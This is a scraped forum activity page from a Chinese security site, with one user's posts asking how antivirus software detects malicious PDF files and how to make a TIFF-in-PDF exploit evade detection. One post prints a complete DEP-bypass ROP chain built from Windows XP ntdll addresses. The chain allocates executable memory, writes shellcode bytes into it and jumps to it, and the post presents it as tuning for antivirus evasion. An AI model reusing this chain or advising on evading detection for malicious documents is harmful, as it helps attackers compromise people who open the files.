|
[求助]shellcode用什么编辑器编辑?
要是能有一个编辑器,左边写汇编程序,右边显示每条语句对应的intel 汇编机器码,这样写shellcode就方便很多了。 |
|
[求助]pdf病毒是怎么样查杀的?
沉了,upupupup! |
|
[求助]pdf病毒是怎么样查杀的?
tiff嵌入到pdf中,再找到tiff的溢出点就没那么方便了,需要先Zlib:Inflate.inflate然后从解出来的xml中把tiff标签抠出来,再把tiff数据解码出来,然后才能去找他的溢出点。 请问pende大侠,ms07-014做免杀的思路是什么呢? |
|
[求助]pdf病毒是怎么样查杀的?
如果真的像你猜测的这样,那可能真的没有免杀方法了。 但是我觉得如果针对一种病毒,病毒库里的数据应该不会太多。如果去解码pdf,提取出tiff,再解释tiff,这个工作量很大啊。还有杀软自己涉及到具体文件格式的话,它又如何保证自己解析的没有漏洞呢? 并且,文件格式太多了,还有些事私用格式呢。doc格式,wps格式,邮件格式,zip格式什么的每种病毒都要解析,杀毒软件能受得了吗? 哪里有杀软杀文件格式类漏洞的文档可以参考学习一下吗? TO nkspark: 我的网络,不能上传文件 |
|
[求助]pdf病毒是怎么样查杀的?
主要是改了绕过DEP的栈数据,栈数据利用主要xpsp2的ntdll.dll中代码。 文件格式我就是改改长度和偏移之类的。 shellcode是metasploit中通用的,报的病毒类型非常准确,所以和shellcode应该没什么关系。 stack_data = [ #构造过程 0x00105092, # anything 0x10124, # ==>ebp 0x7C9013C3, # pop edx / ret 0x10104, 0x7C96BD42, # pop ecx / ret 0x1000, 0x7C971977, # mov [edx], ecx / ret 0x7C9013C3, # pop edx / ret 0x10100, 0x7C96BD42, # pop ecx / ret 0x0, 0x7C971977, # mov [edx], ecx / ret 0x7C90D4DE, # call NtAllocateVirtualMemory 0x7C9013C3, # pop edx / ret 0xffffffff, # para1-> ProcessHandle 0x10100, # para2-> *BaseAddress 0x0, # para3-> ZeroBits 0x10104, # para4-> RegionSize 0x1000, # para5-> AllocationType 0x40, # para6-> Protect 0x100FC, # 0x7C939D3C, # mov eax, [edx+4] / ret 0x7C96BD42, # pop ecx / ret 0x26a525a, 0x7C951376, # mov [eax], ecx / ret 0x77EA18DA, # add eax, 2 / ret 0x77EA18DA, # add eax, 2 / ret 0x7C96BD42, # pop ecx / ret 0x3c2ecd58, 0x7C951376, # mov [eax], ecx / ret 0x77EA18DA, # add eax, 2 / ret 0x77EA18DA, # add eax, 2 / ret 0x7C96BD42, # pop ecx / ret 0xf4745a05, 0x7C951376, # mov [eax], ecx / ret 0x77EA18DA, # add eax, 2 / ret 0x77EA18DA, # add eax, 2 / ret 0x7C96BD42, # pop ecx / ret 0x2a4949b8, 0x7C951376, # mov [eax], ecx / ret 0x77EA18DA, # add eax, 2 / ret 0x77EA18DA, # add eax, 2 / ret 0x7C96BD42, # pop ecx / ret 0xaffa8b00, 0x7C951376, # mov [eax], ecx / ret 0x77EA18DA, # add eax, 2 / ret 0x77EA18DA, # add eax, 2 / ret 0x7C96BD42, # pop ecx / ret 0xfe87ea75, 0x7C951376, # mov [eax], ecx / ret 0x77EA18DA, # add eax, 2 / ret 0x77EA18DA, # add eax, 2 / ret 0x7C96BD42, # pop ecx / ret 0xb95f0aeb, 0x7C951376, # mov [eax], ecx / ret 0x77EA18DA, # add eax, 2 / ret 0x77EA18DA, # add eax, 2 / ret 0x7C96BD42, # pop ecx / ret 0x3e0, 0x7C951376, # mov [eax], ecx / ret 0x77EA18DA, # add eax, 2 / ret 0x77EA18DA, # add eax, 2 / ret 0x7C96BD42, # pop ecx / ret 0x9eba5f3, 0x7C951376, # mov [eax], ecx / ret 0x77EA18DA, # add eax, 2 / ret 0x77EA18DA, # add eax, 2 / ret 0x7C96BD42, # pop ecx / ret 0xfffff1e8, 0x7C951376, # mov [eax], ecx / ret 0x77EA18DA, # add eax, 2 / ret 0x77EA18DA, # add eax, 2 / ret 0x7C96BD42, # pop ecx / ret 0x909090ff, 0x7C951376, # mov [eax], ecx / ret 0x77EA18DA, # add eax, 2 / ret 0x77EA18DA, # add eax, 2 / ret 0x7C96BD42, # pop ecx / ret 0x90ffffff, 0x7C951376, # mov [eax], ecx / ret 0x7C939D3C, # mov eax, [edx+4] / ret 0x7C90EAC5 # call eax / ret ] |
|
|
|
[分享]Exploit 编写系列教程 1-10合集 [修正]
顶,谢谢大家的工作,我也希望能够加入翻译小组为大家服务~ |
|
[注意]邀请码发放公布(10.15~10.28)
终于成为正式会员了,可以无限制下载啦,哈哈 |
|
[转帖]Programming 32-bit Microcontrollers in C - Exploring the PIC32
Where can I find books about vulnerability exploit? |
|
|
操作理由
RANk
{{ user_info.golds == '' ? 0 : user_info.golds }}
雪币
{{ experience }}
课程经验
{{ score }}
学习收益
{{study_duration_fmt}}
学习时长
基本信息
荣誉称号:
{{ honorary_title }}
能力排名:
No.{{ rank_num }}
等 级:
LV{{ rank_lv-100 }}
活跃值:
在线值:
浏览人数:{{ visits }}
最近活跃:{{ last_active_time }}
注册时间:{{ user_info.create_date_jsonfmt }}
勋章
兑换勋章
证书
证书查询 >
能力值